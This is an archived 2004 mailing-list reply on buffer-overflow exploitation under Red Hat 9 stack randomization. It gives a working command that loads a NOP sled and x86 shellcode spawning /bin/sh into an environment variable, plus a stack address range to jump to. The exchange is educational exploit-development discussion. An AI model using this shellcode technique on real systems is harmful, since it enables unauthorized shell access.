Vulnerability Development mailing list archives
Re: Buffer Overflow Help
From: Harry de Grote <rik.bobbaers () cc kuleuven ac be>
Date: Wed, 10 Nov 2004 12:01:24 +0200
Op Tuesday 09 November 2004 04:09, eip () tampabay rr com sgreifde: <snip>
I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat 9 box kernel 2.4.20-31.9. Am I doing something wrong?
no, you don't but... RH does randomize the stack a little iirc so, my way of doing stuff then, is just brute force it! :) (you could also return tu libc or whatever) best way to do it (i think) is : put your shellcode in the env... export SHELLCODE=`perl -e '{print "\x90"x65000 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'` that should give you some breathing space for where to jump to... shellcode starts (on my box at 0xbfff0027, so everything from there to 0xbffffe00 sould do fine... -- harry aka Rik Bobbaers K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50 Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org "\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20" "\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66" "\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63" "\x6c\x65\x0a\x00"
Current thread:
- Buffer Overflow Help eip (Nov 09)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)
- Re: Buffer Overflow Help runixd (Nov 10)
- <Possible follow-ups>
- RE: Buffer Overflow Help Carlos Carvalho (Nov 10)
- Re: Buffer Overflow Help Steve Bonds (Nov 12)
- Re: Buffer Overflow Help Marco Ivaldi (Nov 12)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Steve Bonds (Nov 14)
- RE: Buffer Overflow Help Chris Eagle (Nov 15)
- Re: Buffer Overflow Help Steve Bonds (Nov 15)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)